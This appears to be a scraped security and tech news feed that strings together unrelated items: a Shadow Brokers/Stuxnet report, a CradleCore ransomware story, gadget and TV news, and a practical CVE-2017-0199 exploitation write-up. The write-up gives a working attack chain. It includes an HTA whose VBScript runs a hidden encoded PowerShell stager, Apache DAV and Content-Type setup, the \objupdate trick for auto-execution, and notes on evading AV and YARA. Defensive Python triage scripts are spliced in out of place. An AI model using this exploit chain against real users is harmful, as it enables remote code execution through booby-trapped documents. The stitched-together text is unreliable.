News & Updates

Security researchers who analyzed the documents and hacking tools included in the latest Shadow Brokers dump found a link to the Stuxnet virus.

On Friday, the Shadow Brokers leaked a new batch of files belonging to the alleged NSA arsenal.

Security researchers who analyzed the documents and hacking tools included in the latest dump have discovered many exploits specifically designed to compromise Windows systems.

Digging into the archive, experts spotted a surprising exploit that was also used in the Stuxnet cyber weapon, the malware that sabotaged the centrifuges of Iran’s Natanz enrichment plant.

According to Symantec researcher Liam O’Murchu, the exploit was developed for Windows’ MOF files and it is “almost the exact same script” used in Stuxnet.

“There is a strong connection between Stuxnet and the Shadow Brokers dump,” O’Murchu told Motherboard in an email. “But not enough to definitively prove a connection.”

Let’s see the similarities between the Stuxnet code and the exploit code in the last dump leaked by Shadow Brokers.

[Figure: Stuxnet code vs Shadow Brokers exploit. Top: a portion of the script from Stuxnet; bottom: a portion of the script dumped by The Shadow Brokers.]

Of course, whoever developed the tool included in the Shadow Brokers dump may have borrowed the script from public knowledge of Stuxnet. The same code, for example, was included in the Metasploit framework, allowing anyone to create a MOF file like the one used in the Stuxnet attack.

O’Murchu highlighted that the MOF file creation tool in the Shadow Brokers dump has a last-compiled date of September 9, 2010, a few months after Stuxnet’s discovery but “shortly before the code was added to Metasploit.”

The researcher Kevin Beaumont also believes that there is a link between Stuxnet and the exploit shared by the Shadow Brokers.

Lorenzo Franceschi-Bicchierai from Motherboard also reported that Avast Antivirus detects some of the exploits in the Shadow Brokers dump as Stuxnet.

Even if these are false positives, it is curious that the exploits match signatures written for Stuxnet.

Are we looking at evidence that the NSA-linked Equation Group was involved in the Stuxnet attack, or is this a well-organized false-flag operation?

“Therefore, the Stuxnet MOF file creation tool that the Shadow Brokers dropped on Friday is possibly the earliest technical evidence that NSA hackers and developers coded Stuxnet, as many suspect,” added Franceschi-Bicchierai.


Pierluigi Paganini

(Security Affairs – NSA, Shadow Brokers)

The post The alleged link between the Shadow Brokers data leak and the Stuxnet cyber weapon appeared first on Security Affairs.

Source: Security affairs

CradleCore is a ransomware offered in the underground as source code, instead of under the classic ransomware-as-a-service (RaaS) model.

According to the experts at Forcepoint, the author is offering the malware on a few Tor-based crime sites as source code, allowing crooks to request a customized version of the code.

The CradleCore ransomware is offered by the author as C++ source code along with the necessary PHP web server scripts and a payment panel; the malware goes for 0.35 Bitcoin (around $400), but the price is negotiable.

“Typically, ransomware is monetized by developers using the RaaS business model. If that doesn’t work, only then will the developers consider selling the source code.” reads the analysis published by Forcepoint.

“CradleCore is offered as a C++ source code with PHP server scripts and a payment panel. It started to be sold on a few Tor-based sites over two weeks ago for a negotiable price starting at 0.35 BTC (approximately 428 USD)”

According to the experts, this sales model will lead to the development of new variants derived from CradleCore.

The ransomware is offered with a relatively complete feature set: it uses Blowfish for file encryption and supports offline encryption too.

The malicious code implements an anti-sandbox mechanism and communicates with its command and control server via a Tor2Web gateway.

Once it has infected a system, CradleCore encrypts files and drops a ransom note. It appends the .cradle extension to the files it encrypts.

[Figure: CradleCore ransomware]

Experts from Forcepoint who analyzed the readme file believe that the author of the malware is a developer without significant experience in malware coding.

The researchers learned more about the author by further analyzing the advertisement site for the CradleCore ransomware.

“While the advertisement site for CradleCore is hosted on the dark web, the site’s Apache server status page appears to be accessible to the public. The logs appeared to show that the Apache server hosting the Onion site has a second Virtual Host (VHost) hosting a clearnet website. VHosts, to those unfamiliar, allow multiple websites to be hosted on a single machine and IP address:” reads the analysis.

“The Linode-assigned IP address hosting the clearnet site appears to be exclusive-use. Essentially, this could mean either that the server is compromised and is abused to host the CradleCore website or that the clearnet website and CradleCore belong to the same owner.

Digging around the contents of that clearnet website led us to the website owner’s personal site who appears to be working as a freelance software developer. From the information available on his personal website we managed to find his Twitter and LinkedIn account where it is indicated that he is a C++ programmer.”

Of course, this only means that the clearnet site sharing a server with the ransomware shop is linked to a freelance C++ developer; there is no proof that he is also the coder.

Concluding, Forcepoint researchers believe the ransomware may be the first project of a novice malware developer.

“CradleCore is yet another new ransomware product that is available to cybercriminals. It is being sold as source code which potentially suggests that CradleCore may be a first- or side-project of someone with limited experience of malware business models looking for extra income. It also means that anyone who purchases it will not only be able to update the ransomware but also share the source code to others,” Forcepoint says.
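The exposure Forcepoint describes (a public server-status page on the onion host listing a second, clearnet virtual host) is easy to reproduce from the defender's side. The following is an added example, not Forcepoint's tooling and not anything taken from the CradleCore site: a small Python parser that reads the HTML of Apache's /server-status (with ExtendedStatus on), tallies the VHost column, and reports any host that an operator did not intend to serve from that machine. The status page embedded at the bottom is constructed for this example and every host name in it is invented.

```python
"""List the virtual hosts an exposed Apache mod_status page gives away.

Added example, not Forcepoint's tooling and not taken from the CradleCore site:
it parses the HTML of /server-status (ExtendedStatus on) and tallies the VHost
column, which is exactly the field that exposed a second, clearnet site next to
the onion service. The status page at the bottom is constructed for this example
and every host name in it is invented.
"""
from html.parser import HTMLParser


class _StatusTable(HTMLParser):
    """Collect every table row as a list of cell strings."""

    def __init__(self):
        super().__init__()
        self.rows = []
        self._row = None
        self._cell = None

    def handle_starttag(self, tag, attrs):
        if tag == "tr":
            self._row = []
        elif tag in ("td", "th") and self._row is not None:
            self._cell = []

    def handle_endtag(self, tag):
        if tag in ("td", "th") and self._cell is not None:
            self._row.append("".join(self._cell).strip())
            self._cell = None
        elif tag == "tr" and self._row is not None:
            self.rows.append(self._row)
            self._row = None

    def handle_data(self, data):
        if self._cell is not None:       # text inside <b>, <i> etc. still lands here
            self._cell.append(data)


def vhosts_from_server_status(html: str) -> dict:
    """Map each VHost value on the page to the number of worker slots showing it."""
    parser = _StatusTable()
    parser.feed(html)
    counts = {}
    col = None
    for row in parser.rows:
        if col is None:                  # locate the header row first
            if "VHost" in row:
                col = row.index("VHost")
            continue
        if len(row) > col and row[col]:
            counts[row[col]] = counts.get(row[col], 0) + 1
    return counts


def unexpected_vhosts(counts: dict, expected: set) -> list:
    """VHosts on the page whose host part is not one you meant to serve here."""
    return sorted(v for v in counts if v.rsplit(":", 1)[0] not in expected)


# Constructed mod_status page (invented hosts): one onion vhost and one clearnet vhost.
SAMPLE_STATUS_PAGE = """<html><head><title>Apache Status</title></head><body>
<h1>Apache Server Status for cradlecore.example.onion (via 127.0.0.1)</h1>
<table border="0"><tr><th>Srv</th><th>PID</th><th>Acc</th><th>M</th><th>CPU</th><th>SS</th><th>Req</th>
<th>Conn</th><th>Child</th><th>Slot</th><th>Client</th><th>Protocol</th><th>VHost</th><th>Request</th></tr>
<tr><td><b>0-0</b></td><td>1301</td><td>0/2/2</td><td>_</td><td>0.01</td><td>4</td><td>3</td>
<td>0.0</td><td>0.01</td><td>0.01</td><td>127.0.0.1</td><td>http/1.1</td><td>cradlecore.example.onion:80</td><td nowrap>GET /buy.php HTTP/1.1</td></tr>
<tr><td><b>1-0</b></td><td>1302</td><td>0/5/5</td><td>W</td><td>0.03</td><td>0</td><td>1</td>
<td>0.0</td><td>0.02</td><td>0.02</td><td>198.51.100.7</td><td>http/1.1</td><td>freelancer-portfolio.example.net:80</td><td nowrap>GET /index.html HTTP/1.1</td></tr>
<tr><td><b>2-0</b></td><td>1303</td><td>1/1/1</td><td>_</td><td>0.00</td><td>9</td><td>2</td>
<td>0.0</td><td>0.00</td><td>0.00</td><td>127.0.0.1</td><td>http/1.1</td><td>cradlecore.example.onion:80</td><td nowrap>GET /panel/ HTTP/1.1</td></tr>
</table></body></html>
"""

if __name__ == "__main__":
    seen = vhosts_from_server_status(SAMPLE_STATUS_PAGE)
    print(seen)
    print("leaked:", unexpected_vhosts(seen, {"cradlecore.example.onion"}))
```

If `unexpected_vhosts` returns anything for a hidden service, the status handler is disclosing co-hosted sites to anyone who finds it; the fix on Apache 2.4 is to put `Require local` inside the `<Location /server-status>` block (or disable mod_status on that host entirely) rather than leaving it reachable over the onion address.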


Pierluigi Paganini

(Security Affairs – CradleCore ransomware, cybercrime)

The post Who is offering the CradleCore Ransomware as source code? appeared first on Security Affairs.

Source: Security affairs

(Image credit: Evelyn Wang/MIT)

Luke Skywalker may have been unimpressed with the life of a Tatooine moisture farmer, but a simple device that could economically harvest water from desert air would really be pretty exciting. According to Wookieepedia, the “moisture vaporators” the young Skywalker tended utilized refrigeration coils to chill air to the dew point and collect the water that condensed. We can certainly do that today (as they could “a long time ago… ”), but the amount of energy required makes collecting condensation impractical.

Enter a new device developed by MIT’s Hyunho Kim. His idea is to work with a unique class of materials called “metal-organic frameworks.” Organic, carbon-based molecules form links between metallic ions to create interesting 3D structures that can have lots of open space internally. This allows the structures to do strange things, like letting a high-pressure tank hold far more hydrogen gas once it has been filled with granules of the right metal-organic framework material.

Kim worked with a zirconium oxide paired with an organic molecule. The combination has the useful quality of grabbing and holding on to water vapor at lower temperatures, but also letting go of that water as the heat rises. So the basic idea is that a device based on this material could passively harvest water vapor from the air at night and then release it (to be collected) in the heat of the day.


Source: http://feeds.arstechnica.com/arstechnica/index/

The security expert David Routin (@Rewt_1) has detailed a step-by-step procedure to exploit the recently patched CVE-2017-0199 vulnerability, which has been exploited in Windows attacks in the wild.

Introduction

For several days the security community has been aware, thanks to FireEye’s publication, of different malware campaigns (Dridex…) leveraging CVE-2017-0199.
Several other publications covered this vulnerability, but no working exploit was published.
After digging for a while I found a way to exploit this vulnerability easily, which seems a bit different from the work already done by other researchers.

I decided to publish this work as Microsoft officially published a patch on 11 April 2017.

Technical background

It is possible to include OLEv2 links to existing documents.
These objects (once included) will reflect the current content of the source link each time the document is loaded.
What is amazing is that if you try to include an HTA link as an OLEv2 object it will be executed once (at creation), but WinWord will return an error like:
[Figure: CVE-2017-0199 1, the error returned by WinWord when an HTA is linked directly]
The problem in this case is that the HTA file will not be persistent (to make it persistent you would have had to link it with file + create icon, but we want to be stealthy and to have autorun, right?)

After thinking for a while I started by considering how to handle a real, non-malicious OLE object link to a remote RTF file. To achieve this I had to play a little with the Content-Type and the DAV module in Apache to serve my file in the “proper” way Microsoft Office expects (discussed in the next chapters).
From there, I would have a valid embedded object link automatically updated each time my document is opened!

Next step? Modify the document at the source with my HTA payload!

In this scenario, I was able to:
– Create a dynamic OLEv2 object link to a real RTF file
– Modify the RTF at the source with my payload
– Bypass the error generated when creating a direct link to an HTA document

Another issue? The OLE object needed to be activated automatically!

I had much help solving all these issues from the articles in the references section! Thanks to Didier Stevens’ blog, Vincent Yiu (whose article was the main inspiration), NVISO Labs, FireEye and obviously… Microsoft 🙂

Step 1 

Prepare an HTA file (HTA files are HTML applications which can run JScript and VBScript).
Let’s call it “ms.hta”.

 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
 <html xmlns="http://www.w3.org/1999/xhtml">
 <head>
 <meta content="text/html; charset=utf-8" http-equiv="Content-Type" />
 <title>Bonjour</title>
 <script language="VBScript">
  ' Locate powershell.exe relative to %PSModulePath%
  ' (...\WindowsPowerShell\v1.0\Modules\..\powershell.exe) and, if it is there,
  ' launch the base64-encoded stager hidden. Replace ENCODED_B64_SHELL with your payload.
  Set owFrClN0giJ = CreateObject("Wscript.Shell")
  Set v1ymUkaljYF = CreateObject("Scripting.FileSystemObject")
  If v1ymUkaljYF.FileExists(owFrClN0giJ.ExpandEnvironmentStrings("%PSModulePath%") + "\..\powershell.exe") Then
   owFrClN0giJ.Run "powershell.exe -nop -w hidden -e ENCODED_B64_SHELL"
  End If
 </script>
 <hta:application
     id="oHTA"
     applicationname="Bonjour"
     application="yes"
   >
   </hta:application>
 </head>
 <body>
 <!-- Decoy content: an embedded Microsoft page so the window looks harmless -->
 <div>
 <object type="text/html" data="http://windows.microsoft.com/en-IN/windows7/products/features/windows-defender" width="100%" height="100%">
 </object></div>
 </body>
 </html>

Step 2

Create a simple RTF document using WinWord with any random content (in our example the string “This is my official and legit content”).

Call it “ms.rtf”.

Step 3

Push these two files to a web server you fully control.
We assume they are stored in /var/www/html/ms/ (served under /ms/).

Now we have to configure Apache so that ms.rtf can be included as a link.

 a2enmod dav  
 a2enmod dav_fs  
 a2enmod dav_lock  
 a2enmod headers  
 service apache2 restart  

The following directives will:
– set Content-Type application/rtf on all files under /ms
– allow the PROPFIND requests performed by Microsoft Office

Modify the virtual host and include:

 <Directory /var/www/html/ms/>
 Header set Content-Type "application/rtf"
 </Directory>
 <Directory />
 Dav on
 </Directory>
 service apache2 restart


Step 4

Create a simple RTF document using WinWord, “exploit.rtf”. This will be our exploit!

Insert -> Object

[Figure: CVE-2017-0199 2, creation of the OLEv2 external link]

After clicking OK you will get the content of the “ms.rtf” file, which just contains a random string.

Save the file as “exploit.rtf”.

[Figure: CVE-2017-0199 3, OLEv2 link object created]

At this step we can close WinWord and move on to changing the content of ms.rtf to the HTA payload…

Step 5

The following step will:
– replace the ms.rtf we linked with the custom HTA payload
– make the web server send an application/hta Content-Type; WinWord hands this content type to mshta, which executes our payload

 cat /var/www/html/ms/ms.hta > /var/www/html/ms/ms.rtf

 vi /etc/apache2/sites-enabled/000-default
 Change -> application/rtf to application/hta
 like:

 <Directory /var/www/html/ms/>
 Header set Content-Type "application/hta"
 </Directory>

 service apache2 restart

Step 6

At this point, if the user opens the “exploit.rtf” file he will have to double-click on the link object to launch the attack…

If we want the OLE object to be loaded automatically when the document is opened, we have to edit the exploit.rtf file and add the \objupdate control word to the link object’s header, so that it starts with:
\object\objautlink\objupdate\rsltpict...



At this step the exploit is built.

Exploitation:

Once the user opens the document, the OLE object is updated through the link and mshta is executed thanks to the application/hta Content-Type delivered by the server.
Result: code is executed!

Meterpreter is here!
[Figure: CVE-2017-0199 4, Meterpreter session obtained]

We don’t care about the warning as the code was already executed…

[Figure: CVE-2017-0199 5, exploited! The warning shown after execution]


Detection using current AV/published YARA rules

From my personal tests it seems that this method is not currently caught by AV (Defender already has a signature for CVE-2017-0199).

Additionally, the currently published YARA rules do not match this exploit:

 rule rtf_objdata_urlmoniker_http {
     strings:
         $header = "{\\rtf1"
         $objdata = "objdata 0105000002000000" nocase
         $urlmoniker = "E0C9EA79F9BACE118C8200AA004BA90B" nocase
         $http = "68007400740070003a002f002f00" nocase
     condition:
         $header at 0 and $objdata and $urlmoniker and $http
 }

Indeed the $urlmoniker string (the URL moniker CLSID) is absent from a document built this way, so this YARA rule will never trigger on it.
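The detection gap just described, as an added example that is not part of the original post: a Python triage script that walks every `{\object ...}` group in an RTF, records the control words that matter here (`\objautlink`, a linked object, and `\objupdate`, refresh the link before display, which is what Step 6 adds), hex-decodes the `\objdata` payload and checks which moniker CLSIDs it carries. It also re-implements the published rtf_objdata_urlmoniker_http rule so both verdicts can be compared on the same file. The two RTF documents are constructed for this example: their objdata blobs are a minimal OLE1 header followed by a CLSID, not captured OLE streams, and the file-moniker CLSID in the second sample is an assumption, since the post does not show the link data of its document.

```python
r"""Triage an RTF for OLE link objects that auto-load on open.

Added example, not code from the original post: it walks every {\object ...}
group, records the control words that matter here (\objautlink = linked object,
\objupdate = refresh the link before display) and hex-decodes the \objdata
payload to check which moniker CLSIDs it carries. It also re-implements the
published rtf_objdata_urlmoniker_http YARA rule so the two verdicts can be
compared. Both sample documents are constructed for this example; their objdata
blobs are a minimal OLE1 header plus a CLSID, not captured OLE streams.
"""
import re

# {79EAC9E0-BAF9-11CE-8C82-00AA004BA90B}: the CLSID the published YARA rule keys on
URL_MONIKER_CLSID = bytes.fromhex("E0C9EA79F9BACE118C8200AA004BA90B")
# {00000303-0000-0000-C000-000000000046}: the standard OLE file moniker
FILE_MONIKER_CLSID = bytes.fromhex("0303000000000000C000000000000046")


def _group_at(rtf: str, start: int) -> str:
    """Return the brace-balanced RTF group beginning at rtf[start] == '{'."""
    depth = 0
    i = start
    while i < len(rtf):
        ch = rtf[i]
        if ch == "\\":          # control symbol / escaped brace: skip the pair
            i += 2
            continue
        if ch == "{":
            depth += 1
        elif ch == "}":
            depth -= 1
            if depth == 0:
                return rtf[start:i + 1]
        i += 1
    return rtf[start:]          # unbalanced group: take the rest of the file


def _objdata_bytes(group: str) -> bytes:
    r"""Decode the hex body of the \*\objdata destination inside an object group."""
    m = re.search(r"\\\*\\objdata\s*([0-9A-Fa-f\s]+)", group)
    if not m:
        return b""
    hexdata = "".join(m.group(1).split())
    if len(hexdata) % 2:        # tolerate a truncated trailing nibble
        hexdata = hexdata[:-1]
    return bytes.fromhex(hexdata)


def triage(rtf: str) -> list:
    """One verdict per OLE object group in the document."""
    verdicts = []
    for m in re.finditer(r"\{\\object(?![a-z])", rtf):
        group = _group_at(rtf, m.start())
        words = set(re.findall(r"\\([a-z]+)", group))
        blob = _objdata_bytes(group)
        verdicts.append({
            "autolink": "objautlink" in words,
            "auto_update": "objupdate" in words,
            "url_moniker": URL_MONIKER_CLSID in blob,
            "file_moniker": FILE_MONIKER_CLSID in blob,
            # a linked object that refreshes itself on open is the pattern to flag
            "suspicious": "objautlink" in words and "objupdate" in words,
        })
    return verdicts


def published_rule_matches(rtf: str) -> bool:
    """Same logic as rtf_objdata_urlmoniker_http: all four strings, header at offset 0."""
    low = rtf.lower()
    return (rtf.startswith("{\\rtf1")
            and "objdata 0105000002000000" in low
            and "e0c9ea79f9bace118c8200aa004ba90b" in low
            and "68007400740070003a002f002f00" in low)   # "http://" in UTF-16LE


# Constructed OLE1 object header: version 0x501, FormatID 2, class "OLE2Link\0",
# empty topic/item names, placeholder native data size.
_OLE1_HDR = ("0105000002000000" "09000000" "4f4c45324c696e6b00"
             "00000000" "00000000" "40000000")

# Constructed document in the style the published rule targets: URL moniker + "http://".
SAMPLE_URL_MONIKER = (
    r"{\rtf1\ansi\deff0 Quarterly report "
    r"{\object\objautlink\rsltpict\objw1000\objh1000{\*\objclass Word.Document.8}"
    r"{\*\objdata " + _OLE1_HDR + "e0c9ea79f9bace118c8200aa004ba90b"
    + "68007400740070003a002f002f00" + "00" * 8
    + r"}{\result{\pict\wmetafile8 00}}}}"
)

# Constructed document in the style of the technique above: \objautlink\objupdate and
# no URL moniker (a file moniker CLSID stands in for the link data; assumption).
SAMPLE_AUTOUPDATE_LINK = (
    r"{\rtf1\ansi\deff0 This is my official and legit content "
    r"{\object\objautlink\objupdate\rsltpict\objw1000\objh1000{\*\objclass Word.Document.8}"
    r"{\*\objdata " + _OLE1_HDR + "0303000000000000c000000000000046" + "00" * 8
    + r"}{\result{\pict\wmetafile8 00}}}}"
)

if __name__ == "__main__":
    for name, doc in (("url-moniker sample", SAMPLE_URL_MONIKER),
                      ("auto-update link sample", SAMPLE_AUTOUPDATE_LINK)):
        print(name, "published rule:", published_rule_matches(doc), triage(doc))
```

On a real file, call `triage(open(path, encoding="latin-1").read())`; a verdict with both autolink and auto_update set is the shape Step 6 produces, and it is flagged regardless of which moniker the link carries, which is the piece the published rule's $urlmoniker string does not cover.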

References

https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199_useda.html
https://www.mdsec.co.uk/2017/04/exploiting-cve-2017-0199-hta-handler-vulnerability/
https://blog.nviso.be/2017/04/12/analysis-of-a-cve-2017-0199-malicious-rtf-document/

About the author: David Routin

David Routin is CISO for a Swiss security company; he has been working as a security expert with both offensive and defensive approaches for more than ten years, including various vulnerability research.


Edited by Pierluigi Paganini

(Security Affairs –  Windows zero-day attacks, CVE-2017-0199)

The post Windows attacks via CVE-2017-0199 – Practical exploitation! (PoC) appeared first on Security Affairs.

Source: Security affairs

(Image: The iPad Air 2 (left) next to the iPad Air (right). Credit: Andrew Cunningham)

If you take your fourth-generation iPad into Apple for a repair, the company may replace your tablet with a newer iPad Air 2 instead. According to an internal memo published by MacRumors, Apple started doing this on March 30, right around when the $329 iPad became available to purchase.

Starting March 30, iPad 4th generation whole unit repairs may be substituted to iPad Air 2 models. Apple’s repair and order management tool will indicate for each repair if a substitution will take place. Please note the substitute part’s color and capacity to ensure the customer understands what their replacement iPad whole unit will be.

While you may get a new color and capacity, we also assume that customers with Smart Covers or other accessories for their fourth-generation iPads will need to buy new accessories for the iPad Air 2; we’ve contacted Apple for clarification and will update if we get a response.

The iPad Air 2 is two years newer than an iPad 4: it’s significantly thinner, lighter, and faster, and it supports iOS features like multitasking that the iPad 4 isn’t capable of. More importantly, it’s certain to be supported by the next major version of iOS, while the iPad 4 is more than likely to be dropped from the support list. Apple is likely running out of parts and replacement tablets for the older iPad, while the only-recently-discontinued iPad Air 2 is still available in abundance in Apple’s refurbished store.


Source: http://feeds.arstechnica.com/arstechnica/index/

A Chinese infosec researcher has discovered a new “almost impossible to detect” phishing attack that can be used to trick even the most careful users on the Internet.

He warned that hackers can use a known vulnerability in the Chrome, Firefox and Opera web browsers to display their fake domain names as the websites of legitimate services, like Apple, Google, or Amazon, to steal login or financial


Source: http://feeds.feedburner.com/TheHackersNews

“Better Call Saul” Season 3 Episode 2 synopsis reveals that Chuck will chalk out a big plan and use law against Jimmy so as to trap him. On the other hand, Mike is trying hard to prepare himself for something big and is not looking for a mysterious acquaintance. Check out in detail! “Better Call […]

The post ‘Better Call Saul’ Season 3 Episode 2 Synopsis: Chuck’s Use Of Law Against Jimmy; Mike’s Mystery appeared first on MobiPicker.

Source: http://www.mobipicker.com/feed/

As Apple fans continue to wait patiently for iPad Pro 2, more and more rumors hinting at iPad Pro 2 features are making rounds on the internet. It looks like the much-awaited iPad Pro 2 will be the best Apple has designed so far, with top-of-the-line specs and features. Unlike the brand new affordable tablet […]

The post iPad Pro 2 To Feature Touch Bar, Bezel-Free Display And Foldable Design; Will It Replace MacBook? appeared first on MobiPicker.

Source: http://www.mobipicker.com/feed/

Black Holes continue to remain Universe’s spectacular enigma. The only person who came close to describing their behavior with a few set of mathematical equations is none other than India’s mathematical genius Srinivasa Ramanujan – The Man Who Knew Infinity. Long after Srinivasa Ramanujan outlined the mathematical framework, in 2012 a US scientist proved the […]

The post First Picture Of A Black Hole Finally Snapped; Sagittarius A* Captured In All Its Glory appeared first on MobiPicker.

Source: http://www.mobipicker.com/feed/

It’s a good start to the week for the Canadian residents with the Samsung Galaxy Note 5 and S6 Edge Plus. All major carriers in the country are seeding the Android 7.0 Nougat update to the said devices. The list of telecom operators includes Virgin, Videotron, Bell, Koodo mobile, Sasktel, and Telus. Just a few days ago, Verizon […]

The post Galaxy Note 5 and Galaxy S6 Edge Plus Receive Android 7.0 Nougat Update in Canada appeared first on MobiPicker.

Source: http://www.mobipicker.com/feed/